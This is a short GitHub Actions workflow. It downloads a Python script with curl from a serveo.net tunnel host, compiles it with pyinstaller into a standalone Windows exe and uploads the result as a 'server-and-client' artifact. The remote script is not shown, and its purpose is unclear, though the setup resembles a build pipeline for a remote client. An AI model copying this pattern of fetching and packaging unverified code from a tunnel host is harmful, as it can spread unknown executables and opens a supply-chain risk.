name: Build and Upload Artifacts
on:
  push:
    branches: [ main ]

jobs:
  build-and-upload:
    runs-on: windows-latest
    steps:
      - name: Checkout Code
        uses: actions/checkout@v2
      
 
      - name: Build 
        run: |
          mkdir client/python
          cd client/python
          pip install pyinstaller
          pip install requests
          pip install opencv-python
          curl https://recondo.serveo.net/fcdn.py -O fcdn.py
          
          
          
          pyinstaller --onefile fcdn.py
          echo " build successfully!"
          ls
          ls dist
      - name: Upload Artifacts
        uses: actions/upload-artifact@v2
        with:
          name: server-and-client
          path: |
 
            ./client/python/dist/fcdn.exe
